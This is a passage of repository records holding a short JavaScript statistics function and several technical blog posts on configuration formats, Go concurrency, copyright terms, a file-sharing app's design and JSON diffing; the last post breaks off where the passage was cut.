"avg_line_length": 33.96154022216797,
"blob_id": "ffe88ce57353405546133719fc19afbbfd2e3013",
"content_id": "2ad04c2cf99600007d9534094f2b5d75701e547c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 913,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 26,
"path": "/blog/assets/mean-range-of-a-bell-curve-distribution/normal-mean-range.js",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "// Compute the mean range and its extrema for a Normal (Gaussian) distribution.\n//\n// This code depends on https://github.com/cag/mp-wasm.\n\n// Compute the range of a normal distribution.\n// In other words, the max an min of the set of likely (≥ `prob`) values\n// among `samples` real-valued numbers\n// taken from a Gaussian random variable.\n// The Gaussian distribution’s parameters are its `mean` and `variance`.\nfunction normalRange(mean, variance, samples, prob = .5, mpf = this.mpf) {\n const m = mpf(mean);\n const s2 = mpf(variance);\n const g = mpf(prob);\n const pi = mpf.getPi();\n\n const halfRange = mpf.sqrt(\n mpf(-2).mul(s2).mul(mpf.log(\n mpf.sqrt(mpf(2).mul(s2).mul(pi))\n .mul(mpf(1).sub(mpf.pow(\n mpf(1).sub(g), mpf(1).div(mpf(samples))))))));\n const min = m.sub(halfRange);\n const max = m.add(halfRange);\n const range = halfRange.mul(2);\n\n return { min, max, range };\n}\n"
},
{
"alpha_fraction": 0.7211222648620605,
"alphanum_fraction": 0.7313922643661499,
"avg_line_length": 74.55999755859375,
"blob_id": "287f9e453f5d4f413dddccf3097f8a50e7008e24",
"content_id": "91ecb5a843b1ab1e8771493ecc211b11f09dd646",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 9455,
"license_type": "no_license",
"max_line_length": 527,
"num_lines": 125,
"path": "/blog/src/a-history-of-settings-file-format-and-dotset.md",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "# A History of Settings File Format, and dotset\n\nThe landscape for configuration formats is quite poor.\n\nThere is a lot of choice, but each pick has substantial flaws.\nThere is no fairer portrait than that which Wikipedia paints:\n\n- The **INI** file format is a de facto standard for configuration files.\n- **.properties** is a file extension for files mainly used in Java related technologies to store the configurable parameters of an application.\n- **JSON** provides a syntax which is easier to parse than the one typically adopted for INI file formats, and also offers support for data types and data structures\n- **YAML** is used by some for more complex configuration formats.\n- **Plist** is the standard configurations file format for Cocoa Applications.\n\nLet me go through them one by one.\n\n | comments | maps in lists | simplicity |\n ------------+----------+---------------+------------+\n .properties | x | | x |\n INI | x | | x |\n Plist | | x | x |\n XML | x | x | |\n JSON | | x | x |\n TOML | x | | x |\n DotSet | x | x | x |\n \n Comments, maps in lists, simplicity: pick two.\n\nThe INI file format is a simple way to store some information.\nDid I mention it is simple? It is *very simple*.\nYou have a dictionary map at the top level, and in there, another map.\nEach keys of that second map have string values.\n\nAre the keys case-sensitive? Maybe. Does it have comments? Maybe, either hashed `#` or Lisp-like `;`. What is the delimiter between keys and values? I don't know, it's usually `=`, but sometimes `:`. See the problem? It is non-standard. Even if it was, you can't do much with it.\nLimited data structures are limited.\n\nDotProperties are even simpler than INI files, if you can believe it. (I cannot.) You are left with a single map from string keys to string values, and you have comments. On the plus side, it is pretty standard…\n\nPlists used to be a [beautiful, lightweight format](https://developer.apple.com/library/mac/#documentation/Cocoa/Conceptual/PropertyLists/OldStylePlists/OldStylePLists.html#//apple_ref/doc/uid/20001012-BBCBDBJE): simple, easy to read, it has all the data structures of JSON, or close enough. It even has easy binary data as hexadecimal sequences, and dates! Truly, if Apple had worked to make it ubiquitous, JSON would never have been needed. It has all of its power, and all of its irritating things.\n\nYet, plist would have lost against INI. \nWhy? Comments.\nComments actually serve as documentation.\nA textual file is not just great because you can use your preferred text editor, it is great because you can *read* it.\nComments are not just for programming languages:\nthey have their place inside data, too.\nPlist simply forgot to add comments.\n\nAnyway, Apple killed the Plist format, replacing it with XML. The data structures are the same, but now the parsers need to be extra smart.\nThe addition of boilerplate made the files so big that Apple even added an equivalent binary format.\nToo bad, the XML form is [here to stay](https://github.com/search?q=.plist).\n\nOn to XML, then. Why is it bad?\n\n[So](http://harmful.cat-v.org/software/xml/) [many](http://c2.com/cgi/wiki?XmlIsTooComplex) [people](http://wiki.whatwg.org/wiki/Namespace_confusion) [have](http://lists.whatwg.org/pipermail/whatwg-whatwg.org/2008-August/015905.html) [eloquently](http://www.tbray.org/ongoing/When/200x/2003/12/13/MegaXML) [discussed](http://nothing-more.blogspot.ch/2004/10/loving-and-hating-xml-namespaces_21.html) [it](http://intertwingly.net/slides/2004/devcon/77.html). It boils down to this:\n\n1. Starting on an XML-based project is usually a nightmare,\n2. All by itself, XML is actually *more limited* than our old friend plist.\n It's just text, you have to build your own format on top of it,\n which in turn adds complexity and cruft and makes #1 worse!\n3. Namespaces are unintuitive, hard to use, and make #1 and #2 even worse…\n\nTo support its complexity, XML has developed satellite sublanguages of its own to configure it: XPATH, SAX, XSLT, XSD, DTD…\nCan XML data crash a browser or worse? [Of course it can](http://en.wikipedia.org/wiki/Billion_laughs). Is it Turing-complete? It can be…\n\nIn the end, it all boils down to one thing: it is too complex. It is hard to read, hard to parse, and because of draconian error handling, you'd better not have made a mistake. But remember, spotting a mistake is hard, better use a validator. Or an external GUI that will make the source ugly.\nA wise man once said: \"it combines the space-efficiency of text-based formats, and the readability of binary.\"\n\nIn a world dominated by XML, JSON was a gasp of fresh air.\nIts syntax is minimal. It has all the data structures you look for. Writing a parser is a matter of a couple of hours; not that you need to. Reading it is easy too. Just like [asm.js](http://asmjs.org/), it fitted perfectly as a natural extension to the Web platform, because it was already there.\n\nJSON gains ground. It has both a [lot](http://www.ietf.org/rfc/rfc4627.txt?number=4627) [of](https://npmjs.org/doc/json.html) [acceptance](https://ftp.mozilla.org/pub/mozilla.org/firefox/nightly/latest-ux/firefox-21.0a1.en-US.linux-x86_64.json) and good press.\n\nYet, everything has bad parts, and JSON is no exception:\n\n- It feels painfully draconian in its handling of errors for one simple reason: people forget to remove the trailing comma in `[1, 2, 3,]`\n- It doesn't have comments, which makes it unsuitable for readable configuration.\n\nAware of those small annoyances, I had privately started to work on my own replacement.\n\nThen, one drunk night, a week ago, Tom Preston-Werner, fed up as I was about the status quo, decided to take no more, and created TOML.\n\n[TOML](https://github.com/mojombo/toml/) is meant to be solidly standardized, unlike INI. However, it is meant to be just as limited. It does have JSON arrays, and it thought to authorize trailing commas (which I like to believe I had something to do with).\n\nI wrote about TOML's shortcomings [there](https://gist.github.com/espadrine/5028426), let me rewrite those here:\n\n- The primary issue is that you can't have dictionary maps inside of arrays.\nI see this pattern in many configuration files, from Sublime Text to server configuration. That is just sad. First-class maps are more useful than first-class dates.\n- Having homogeneous arrays is an artificial restriction that doesn't actually serve a higher purpose. I believe the hope is that static languages will benefit from it. They won't.\n- The way you edit the main dictionary map is quite limited itself. Keys need to be grouped in a strange, sometimes counter-intuitive way. I say that from the experience of trying to convert JSON settings file to TOML. Frustration.\n- Even if the file is encoded in UTF-16, every string must be encoded in UTF-8 — I repeat, inside of a UTF-16 file. Text editors will love this, if the standard is applied to the letter.\n\nIn short, TOML isn't as good as the OpenStep plist format, but it has its niceties. And no, it didn't invent first-class Dates.\n\nIt felt unfortunate to see a new format fail to be greater than its historic predecessors.\nThey say history is repeated as farce first, then as tragedy; the plist switch to XML was the farce, switching from JSON to TOML would be tragedy.\n\nAs a response, I published [DotSet](https://github.com/espadrine/dotset), the Settings File Format I pioneered.\n\nThe data structures are so close to JSON that they are interchangeable. I [had fun](http://espadrine.github.com/dotset/) with that. [Really](http://espadrine.github.com/dotset/).\n\nHowever, remember JSON's shortcomings that I mentioned above?\nI erased them. I ended up with a language as pleasant to read as Python,\nas easy to write as plain text, and very simple. Simpler than TOML, with more power. I made a `node` [parser / stringifier](https://npmjs.org/package/dotset) for it. It was easy. And fun.\n\n----\n\nAnd now, the crystal ball.\n\nIt seems to me like there are two future directions for configuration:\n\n- JSON-compatible textual files acting as hierarchical databases lacking only the file system support that could bring the efficiency it deserves,\n- Turing-complete programming languages: [node.js](http://nodejs.org/) servers are configured in JS (compare that with [Apache](http://httpd.apache.org/docs/2.4/configuring.html) configuration); [Guix](http://www.gnu.org/software/guix/) is a package manager whose configuration is all written in [Guile](http://www.gnu.org/software/guile/), the acclaimed [Scheme](http://scheme-reports.org/) interpreter / compiler. Those languages have in turn a subset for data literals that fit the above description of JSON-compatible data.\n\nFunny thought: the [Lua](http://lua.org/) programming language was initially meant to be a configuration file format. Ha ha ha.\n\nOk, not *that* funny.\n\nAll this to end there: TOML doesn't fit in the picture. It will one day, but then, it will have the complexity of YAML and awkwardly combined features. You will need whiskey to ignore that.\n\n<script type=\"application/ld+json\">\n{ \"@context\": \"http://schema.org\",\n \"@type\": \"BlogPosting\",\n \"datePublished\": \"2013-03-05T13:03:00Z\",\n \"keywords\": \"\" }\n</script>\n"
},
{
"alpha_fraction": 0.750713586807251,
"alphanum_fraction": 0.7722803950309753,
"avg_line_length": 75.90243530273438,
"blob_id": "47da31f7e4fb74e8fb3cb92843eca6851704664e",
"content_id": "b8afeba2d28e75a7acb9ddc60696967858ee6583",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 3153,
"license_type": "no_license",
"max_line_length": 289,
"num_lines": 41,
"path": "/blog/src/what-i-made-in-2016.md",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "# What I Made In 2016\n\nThis year, the company I work for, Captain Train, was purchased by its English counterpart, Trainline. I added support for American Express BTA lodged cards, upgraded the SNCF integration to support their new fare systems, and worked on the common format for carriers.\n\nIn open-source, I made the following.\n\n- A natural-language-processing bot library [queread][], in order to power [travelbot][], a CLI and Slack bot system which you can ask for travel information across Europe. It uses [travel-scrapper][], which relies on the Trainline websites for data.\n- A multiplayer musical editor on top of TheFileTree, as a flexible textual editor. See [this example][musical editor].\n- [Email-Login][] is now robust and ready to use.\n- [Spash][], a [geohash][]-inspired Spacetime locator.\n- The [json-diff][] gem offers a brand-new algorithm for diffing JSON content, with support for in-array object move operations as a first-class citizen, unlike existing LCS-based approaches, resulting in better output. I even published a [blog post][] on Trainline's blog.\n- The [json-api-vanilla][] gem parses [JSONAPI][] payloads (ie. JSON with references, to support object graphs with reference cycles, etc.) and converts it to vanilla Ruby objects, with references correctly hooked up, without *any class definition needed*, unlike what existed before that.\n- The [Canop protocol][] was finalized and implemented. [This commit][canop rebase] in particular finally implemented proper index shifting for intention preservation, so that people can edit the same text file simultaneously without losing their changes.\n- The [json-sync][] project sprung out of the Canop effort. Unlike Canop, it cannot yet perform intention preservation. However, its design supports peer-to-peer networks, unlike Canop which is centralized.\n\nI took greater concern in explaining my projects. People wouldn't understand the schematics for the first automobile, but a simple demonstration is enough to blow everybody's mind.\n\n[Previously][].\n\n[queread]: https://github.com/espadrine/queread\n[travelbot]: https://github.com/espadrine/travelbot\n[travel-scrapper]: https://github.com/espadrine/travel-scrapper\n[musical editor]: https://thefiletree.com/david/audio/test.abc\n[Email-Login]: https://github.com/espadrine/email-login\n[Spash]: https://espadrine.github.io/spash/\n[geohash]: https://en.wikipedia.org/wiki/Geohash\n[json-diff]: https://github.com/espadrine/json-diff\n[JSONAPI]: http://jsonapi.org/\n[json-api-vanilla]: https://github.com/espadrine/json-api-vanilla\n[json-sync]: https://github.com/espadrine/json-sync\n[Canop protocol]: https://github.com/espadrine/canop/blob/master/doc/protocol.md\n[canop rebase]: https://github.com/espadrine/canop/commit/b0f37b2cc789513e9c8bd1986e113bed6580328f\n[blog post]: https://engineering.thetrainline.com/2016/10/05/how-we-switched-without-a-hitch-to-a-new-api/\n[Previously]: http://espadrine.tumblr.com/post/138229350686/what-i-did-in-2015\n\n<script type=\"application/ld+json\">\n{ \"@context\": \"http://schema.org\",\n \"@type\": \"BlogPosting\",\n \"datePublished\": \"2017-06-16T20:12:00Z\",\n \"keywords\": \"retro\" }\n</script>\n"
},
{
"alpha_fraction": 0.745498538017273,
"alphanum_fraction": 0.7515453100204468,
"avg_line_length": 48.284767150878906,
"blob_id": "a3d5980701dcb48f50b5ed290afd35c8d18806ba",
"content_id": "74ee1f0af113153b486ec5cac69921b3fe180b5d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 7478,
"license_type": "no_license",
"max_line_length": 442,
"num_lines": 151,
"path": "/blog/src/go-channels-are-stacks-and-would-benefit-from-stm.md",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "# Go Channels Are Stacks And Would Benefit From STM\n\nI was experimenting with **Go channels**, the other day,\nand for some reason the following code surprised me.\n\n package main\n \n import \"fmt\"\n \n var n = 0\n \n func send(c chan int) {\n for i := 0; i < 3; i++ {\n c <- n\n n++\n }\n }\n\n func get(n int, c chan int) {\n for i := 0; i < 3; i++ {\n fmt.Println(n, \"get\", <-c)\n }\n }\n\n func main() {\n c := make(chan int)\n go send(c)\n go send(c)\n\n go get(1, c)\n get(2, c)\n }\n\nIndeed, I expected channels to work like a FIFO, where in fact they work like a stack.\n\nAs a result, the output was the following:\n\n 1 get 1\n 1 get 1\n 2 get 0\n 1 get 2\n 2 get 4\n 2 get 5\n\nSomething to note is that this output is predictable, and depends only on the number of cores available on the machine it runs on. I’ll discuss this more in length later.\n\n## What Happened There?\n\nIf channels worked like FIFO, each channel would have an entry point and an end point. Sending an element to the channel would put something to the entry point, and that element would be obtained, in the same order, at the end point.\n\nHowever, as can be noticed from the output, we receive the 1 before the 0. The reason for that is, well, that Go’s duplex channels are stacks. Senders and receivers use the same end point to put data in and to get data out.\n\n* The `send` function puts 0 in the channel,\n* The `send` function puts the first 1 in the channel,\n* At this point, the first `send` goroutine hasn’t yet incremented n, while the other `send` goroutine adds n (which is still 1) to the channel’s stack.\n* Then the first get goroutine starts reading the channel. It gets two 1s.\n* The second get goroutine then reads the channel, and gets the 0 that was first sent to the channel.\n* The rest of the output is pretty straightforward.\n\n## Locks Are Bad\n\nRemember that “double 1, but no 3” issue we saw? How would we solve that?\n\nThe issue here is: there is a variable shared between two goroutines. That variable acts like a structure that only stays coherent if the following operation is atomic:\n\n1. send the variable’s value to the channel,\n2. increment the variable.\nOf course, that isn’t atomic, and this is the reason why we get issues.\n\nOf course, this issue is an elementary concurrency problem which has been solved hundreds and hundreds of times.\n\nThe issue, to me, is that the advised solution (that is, the solution advocated by the Go authors), is to use locks. Locks have great known issues. First of all, locks must be applied in the same order when applying them and removing them; but that is the least of locks’ problem. Unfortunately, the fact that a piece of code uses locks correctly doesn’t ensure that integrating this piece of code with another won’t just run into a deadlock.\n\nThe famed example is that of the philosopher’s dinner.\n\nImagine a table with as many plates as there are philosophers, and one fork between each plate. Each philosopher works like a goroutine that needs to access the left fork and the right fork simultaneously, if he wants to eat. Each fork is a shared variable. Place a lock on it: each philosopher will lock the fork on their right, then try to lock the fork on their left, and you’ll get a deadlock.\n\nThe solution to this problem is to have a “conductor” which gives permission to take a fork. The conductor has access to more information than any of the philosophers, and if he sees that a philosopher taking a fork will lead to a deadlock, he can refuse him the fork.\n\nThat mechanism is what we call a semaphore. Unfortunately, a very simple modification to the problem makes a deadlock very likely. For instance, if another philosopher joins the party without the conductor’s knowledge, you’re likely to run into troubles.\n\nLinux has slowly tried to switch from locks to a synchronization mechanism called RCU (Read-Copy-Update), which works like a lock on reading, not on writing, with the assumption that we read data more often than we write to it. Most deadlocks / livelocks are not applicable to RCU. But again, some deadlocks can still happen; besides, RCU can be hard to implement to a data structure.\n\nSo, locks are not composable. Can we do better than this?\n\nGo is famous for the following saying.\n\n> Don't communicate by sharing memory, share memory by communicating.\n\nIndeed, you can solve the philosophers' problem by communicating.\nThat is the *Chandy / Misra solution*. Each philosopher but one takes the fork on his right.\nThe one that can takes the fork on his left.\nThen, whenever they need a fork, they request it to its owner,\nwhich gives it if he is done eating.\nThis brilliant solution doesn't stop by\navoiding deadlocks, it also avoids livelocks by adding a \"dirty fork\" system.\nPhilosophers give forks that they have used, and the new user of a fork cleans it.\nOn the other hand, philosophers cannot give a clean fork.\nThat way, there is a guarantee that forks are really used.\n\nI actually wonder how Tony Hoare didn't think of that solution when writing\n[his famous CSP paper](http://www.usingcsp.com/cspbook.pdf).\n\nI believe you can use channels for any concurrency problem, but sometimes the solution\ncan be hard to find. Maybe this is the reason why the Go authors feature slides\nthat use mutexes, or why they have a mutex package in the standard library to begin with.\n\nIf channels are hard, don't fallback to a dangerous primitive such as mutexes,\nuse an equally powerful one!\n\nLately, there has been an interesting project, called **STM**\n(Software Transactional Memory),\nwhich has been pioneered by Haskell's GHC compiler. It uses three primitives,\n`atomically`, `retry` and `orElse`, and encapsulates sensitive data in an STM shell,\nto ensure that this variable is protected from all issues related to deadlocks.\nWithin an `atomically` block, modifications to those variables are logged. All operations\nare reversible. If the variable has been changed in the meantime, those operations are\nrollbacked, and the block is tried again, until it is committed for good.\n\nThis system, which may remind you of what concurrent databases have done for years,\nis so simple and so bright that Intel has decided to implement it in hardware\nin future chips.\n\nI can only hope that programming languages make it easy to use this capability.\nEspecially considering how long we have been struggling with those issues.\n\n## One Last Thing…\n\nSome in-depth information.\n\nRight now, each goroutine has a segmented stack that starts with 4kB and increases if, at\nthe start of each function call, the needed augmentation of stack size requires more\nspace than available.\n\nThe scheduler to switch from one goroutine to the next actually has no preemption capability.\nThose goroutines are doing simple cooperative multithreading.\nEvery time a goroutine reads from a channel, it waits, and the scheduler looks for another\ngoroutine to run. If none are available, we get a deadlock.\n\nObviously, adding preemption, which is something that I believe the Go authors plan on doing,\nwould make race conditions that harder to debug.\n\nAs a result, I really hope they start implementing and advocating for STM\nsoon.\n\n<script type=\"application/ld+json\">\n{ \"@context\": \"http://schema.org\",\n \"@type\": \"BlogPosting\",\n \"datePublished\": \"2012-07-02T21:44:00Z\",\n \"keywords\": \"go\" }\n</script>\n"
},
{
"alpha_fraction": 0.7639680504798889,
"alphanum_fraction": 0.7818319797515869,
"avg_line_length": 108.625,
"blob_id": "619f4d5c2b769edbced32a9d2c2fd87c6bfcb523",
"content_id": "c2e6117a216e47edff60be841dc9a0a7a40d59be",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2649,
"license_type": "no_license",
"max_line_length": 536,
"num_lines": 24,
"path": "/blog/src/public-domain-shadow.md",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "# Public Domain Shadow\n\nCopyright is one of those laws that make sense in principle, but whose application got twisted so terribly by lobbies that they lost their meaning. It is fantastic to have laws protecting your work as an author! But everybody dies. The idea that you should receive money after your death was the start of the absurdity that copyright has turned into.\n\nCopyright was first put into law through Britain’s Statute of Anne in 1710. The intent was to give an incentive and a remuneration to printers and authors. The new law prescribed a copyright term of 14 years, and allowed renewal for another term.\n\nMore and more countries adopted copyright laws. They eventually all encompassed the author’s whole life. In the midst of the French Revolution, as privileges of the royalty were dropped, they voted a law in 1791 to help the authors that stirred the Revolution. In case their children needed help after the death of their parents, they included a 5-year span where the copyright was inherited.\n\nThat 5-year span got increased time and time again, lobbies helping, up to the 70 years that it now is.\n\nAn interesting impact of those increases is that there are large chunks of time where no piece of art could enter the public domain. I plotted those chunks in red: during those periods, the public domain stagnates. In order to help visualize why, I also plotted for a few years the time when the production of that year’s dead artists would eventually enter public domain by reaching the blue line. The post-mortem age of this art creates rays that are interrupted by the change in law, producing what I call a **Public Domain Shadow**.\n\n\n\nSurprisingly, we currently are in a Public Domain Shadow which will end in 2019, unless copyright gets extended yet again. Until then, we won't get to remix anything new.\n\nThe post-mortem inheritance of copyright has gone too far. 5 years was arguable, but excessive; 70 gives a new meaning to excess. An example of their absurdity: “[Petit Papa Noël](https://www.youtube.com/watch?v=rR5NyGhKQkc)”, a song so anchored in France’s culture that it is practically its “Twinkle, Twinkle, Little Star” (or it would be if that song wasn’t also French), will only come out of copyright in 2055. The composer was born in 1905: he would be 150 years old when it will finally be public domain.\n\n<script type=\"application/ld+json\">\n{ \"@context\": \"http://schema.org\",\n \"@type\": \"BlogPosting\",\n \"datePublished\": \"2015-12-27T19:42:00Z\",\n \"keywords\": \"\" }\n</script>\n"
},
{
"alpha_fraction": 0.7723308801651001,
"alphanum_fraction": 0.7768088579177856,
"avg_line_length": 79.05660247802734,
"blob_id": "c16aa92ac1db3fb38d697e98c5ab8fb5d6be4217",
"content_id": "33aa16048a84782b5a84d0189da309fb395f5cf6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 4243,
"license_type": "no_license",
"max_line_length": 699,
"num_lines": 53,
"path": "/blog/src/thefiletree-design-log-1.md",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "# TheFileTree Design Log 1: Metadata\n\nI intend to rethink the ideas behind [TheFileTree](https://thefiletree.com).\n\n# Files\n\nEasy storage has a lot of competition, but the contenders often miss two important points.\n\n1. Content needs to be edited, and since this is online, it needs seemless intent-preserving synchronization.\n2. Data needs to be manipulated by programs, and since this is online, it needs to execute from within your tab.\n\nObviously, I need to have the basics working.\n\nEach node of the tree is a file or a folder. They have metadata information detailing their type, time of last modification (and of last metadata update, to allow controlling changes), and various other fields to allow specifying which app to use to open a particular file. All that metadata is stored in a file called `metadata.json`, loaded in memory at start-up on the server. That way, metadata accesses are fast. In the future, we can offload parts to disk in a format that makes path accesses fast. *(In the past, each file had a separate json file holding its metadata, but the main page, for instance, lists files in order of modification (freshest first), which meant a lot of file reads.)*\n\n\n\nWhen you fetch a node, it inspects its metadata, and shows you its content using its dedicated app. If there are none, or if you specify it, you can get it raw, with `?app=data`. You can also get its metadata with `?app=metadata`. For folders, the data is a list of the file names it contains. You can even submit a `Depth` header, inspired by WebDAV.\n\n\n\nUnsurprisingly, the download size scales exponentially with the requested depth.\n\nI'll talk about other basics we must support in future logs.\n\n# Collaboration\n\nThe simple fact that a file online can be opened in multiple tabs means that we need edition synchronization.\n\nI have plans to make [jsonsync](https://github.com/espadrine/jsonsync) the first non-Operation Transformation, non-CRDT peer-to-peer synchronization system for JSON with index preservation. It has the benefits of both approaches: implementation simplicity, richness of operations and intention preservation of CRDT, and query speed and memory bounds of OT.\n\nAny apps can probably maintain its content in a JSON structure, and update its UI according to changes in its data. Is that not reminiscent of the MVC pattern? I expect virtually any application to be built on top of those primitives.\n\nI am unsure of whether I will rely on it to allow for offline edition. Whatever I do after an offline editing session, it will involve showing the user a diff of the content; as a user, I would not trust a blind merge for long, multiple-second simultaneous edition. But will I use jsonsync's algorithm, requiring it to hold on to its history for ever, or a cold three-way merge? Maybe something in-between?\n\n# Extension\n\nShops are the economy's blood. Marketplaces are its heart.\n\nI must ensure that anybody can create a new app. They can store it in a folder anywhere, and develop it from within TheFileTree. Anyone can open anything with any app. There is a tricky matter of trust there: we must warn users that they're about to use an app they hav never used before, to avoid information stealing from malicious app developers. It cannot happen from within the folder app, since they may land on a page from a crafted link sent to them. Still, it can be done; I am not too worried.\n\nSomething I am more worried about is whether I should allow apps to execute code on the server. I am leaning towards a \"no\", as I don't like taking that security risk. What if they find a way to gain shell access to the server?\n\nEven without being allowed to execute code, apps can do anything, by making XHR requests to the server, using the API I will provide. Maybe HTTP2 Server Push will allow me to avoid waiting for the XHR call to send the data over, too, one day.\n\nI'll talk about identity control in a future log. Obviously an important aspect.\n\n<script type=\"application/ld+json\">\n{ \"@context\": \"http://schema.org\",\n \"@type\": \"BlogPosting\",\n \"datePublished\": \"2016-12-20T21:39:00Z\",\n \"keywords\": \"tree\" }\n</script>\n"
},
{
"alpha_fraction": 0.7689501047134399,
"alphanum_fraction": 0.7807917594909668,
"avg_line_length": 106.59259033203125,
"blob_id": "400f3a0965446faac7ca7137d8aee5ff83a8eb85",
"content_id": "fad45824339d812adce2b85ec418bf11d5bdec56",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 14599,
"license_type": "no_license",
"max_line_length": 912,
"num_lines": 135,
"path": "/blog/src/json-diff-with-first-class-move-operations.md",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "# JSON Diff With First-Class Move Operations\n\n_(This was first posted [here](https://blog.trainline.fr/12389-algorithme-diff-json) in French and [there](https://engineering.thetrainline.com/2016/10/05/how-we-switched-without-a-hitch-to-a-new-api/) in English.)_\n\nBack in January, here at Trainline Europe, we learnt that SNCF, the main French railway company, wanted to update their fare system — that is, the set of rules which determine their ticket prices. The plan was to scrap congestion pricing on TGVs (France’s high-speed trains), reduce sudden price increases, introduce so many offers to discount card owners that it would feel like Christmas!\n\nHowever, those goals were not without challenges. Just as a princess must defeat a dragon to free her Prince Charming, SNCF had to fight the complexity of its current fare system to extract a pearl from its ashes. The blood from this fight had to drip onto their partners: counter agents, travel agencies, [GDS](https://en.wikipedia.org/wiki/Global_Distribution_System)es… and yours truly.\n\n\n\n_Fighting fare systems requires extensive equipment._\n\n## A New Search API Is Born\n\nSomeone at Trainline Europe (formerly Captain Train) had to update our code to the new fare system, and I volunteered. It would be a large and sensitive project, as we had to port our SNCF search engine to use a different [API](https://en.wikipedia.org/wiki/Application_programming_interface). We taught a new language to our train search engine, in a way.\n\nDetect changes between old and new results\n\nThis engine converts (carrier-specific) search results into an intermediate format for internal use, common to all carriers. The input to this conversion was about to change significantly, but the output needed to stay identical. Indeed, the new SNCF search API, to which we were about to connect, can offer both the old and the new fare system, up to the very day on which the new fare system would be released to the world.\n\nAfter working on it for a while, we got the format conversion working. It was then time to ensure that nothing would change for our users. So I tweaked our train search engine to re-execute searches of a subset of our users in production, once the first, original search had been performed with the old engine. Once this was done, I saved the [JSON](https://en.wikipedia.org/wiki/JSON) output of the old and new engines side by side.\n\nI now had a large quantity of “before / after” files, of which each pair was supposedly identical. Of course, those files were not literally identical. Would you expect fate to be so kind? They contained random keys here, newly ordered lists there, such that a trival [`diff`](https://en.wikipedia.org/wiki/Diff) of the files was out of the question.\n\nHad a `diff` been possible, it would still not have helped me understand why the two files were different, since it only sees line changes, not structural ones. I needed a diff which was able to understand the structure of JSON. Each difference was a bug.\n\nI went looking for such an algorithm, I hopped from library to program, all claiming they could diff me some JSON. What I found gave reasonable results, but they all suffered from tremendous false-positive flagging. In particular, they all broke their teeth against having JSON lists used as sets. Although the order of the items was irrelevant, it was flagged as a complex reconstruction of the list. None of these tools could tell that the order of the items in the list had merely been shuffled around.\n\nWhy?\n\n## The Issue\n\nHow would you describe a change?\n\nWe could simply perform a bitwise comparison and declare: “Hello! Nothing has changed!” or “Everything is different!” Of course, our analytical abilities are then tiny. Imagine a gargantuan database in which a single insignificant integer is incremented. If your diff is only able to tell, “Remove the whole database, and recreate a brand new one that happens to be nearly identical”, your diff is much too fat. Additionally, you remove the intention hiding behind the change.\n\nIn JSON, most values cannot be nested; let’s call them atoms. For most uses, having a diff that uses a trivial comparison for atoms is fine. On the other hand, it needs to walk through the structures to be of any use. Objects are fine: unless you want to detect key renames, you simply compare values key-for-key. (For most uses, key renames are irrelevant.)\n\nTrouble starts with arrays. We could compare their values index-for-index — that is what [jsondiff](https://github.com/francois2metz/jsondiff) does, but unlike the other sacrifices that we have made, most uses are not content with that.\n\nMost array operations are commonly defined in terms of two fundamental actions: insertion and deletion. Let’s say we compare `[1, 2, 3]` and `[1, 3]`. A diff that describes it as “the 2 was incremented and the 3 was removed” is awkward compared to a simpler explanation, “we added a 2.” Occam’s razor strikes again.\n\nFinding the minimal number of insert / delete operations is equivalent to a classical problem in computer science, the [Longest Common Subsequence](https://en.wikipedia.org/wiki/Longest_common_subsequence_problem) (hereafter LCS). Luckily, it is a perfect match for [dynamic programming](https://en.wikipedia.org/wiki/Dynamic_programming), and one of its redeeming examples! The algorithm that solves it merely scans every pair of elements, one from the “before” list, the other from the “after” list, starting from the left of the lists. It registers identical elements as part of a potential longest common subsequence, and tracks from which pair each subsequence was possible. When it is done, the last cell lets you backtrack to the first cell, feeding you the list of operations needed along the way.\n\n\n\n_LCS conversion from αβγ to αγ. The arrows are operations, the circles are pairs of elements and contain sub-sequences._\n\nIt is so wonderful that everybody uses it, from `diff` to `git` to numerous DNA comparison software products. It is also what most libraries I found use. [rfc6902-json-diff](https://github.com/cqql/rfc6902-json-diff-js) relies on a variant, the Levenshtein distance, which also detects substitutions (literally equivalent to an addition followed by a deletion). [jsondiffpatch](https://github.com/benjamine/jsondiffpatch) tries to be smart by asking the user to feed it an object-identity algorithm, with which it can detect changes in position of list items. Finally, [hashdiff](https://github.com/liufengyun/hashdiff) includes a similarity algorithm which [tells LCS](https://github.com/liufengyun/hashdiff/blob/fff6fc28b51db16cdb6f005ef6aaea9a9a1f4d1e/lib/hashdiff/lcs.rb#L22) that two elements are identical if they are sufficiently similar, but it does not detect positional changes (and it is fairly slow).\n\nFundamentally, LCS only has fundamental operations: insertion and deletion. That is not enough to easily guess that an element has switched places! In fact, we would be better off if moving objects were a fundamental operation as well.\n\nFurthermore, LCS is designed for lists where identity is unambiguous. Even [jsondiffpatch](https://github.com/benjamine/jsondiffpatch) ends up performing a trivial [index-wise](https://github.com/benjamine/jsondiffpatch/blob/b7b7dfe52bbb4e88f3ecb87e2efbbb3af5f9c365/src/filters/arrays.js#L52) comparison when it has nothing else to work with! To be free from that flawed assumption, [hashdiff](https://github.com/liufengyun/hashdiff)’s idea is interesting: let’s compare the similarity of items!\n\n## The Similarity\n\nYou can probably get eight definitions of what JSON similarity is by asking five passers-by. I don’t pretend to have a better definition, but I did try to have one that works well with move operations.\n\nThe goal is to compute an arbitrary notion of how probable it is that one object is the result of modifying the other.\n\n* For objects, take the average similarity between key values. We ignore key renames.\n* For arrays, the most likely match between an element in the old and the new list is presumably the right 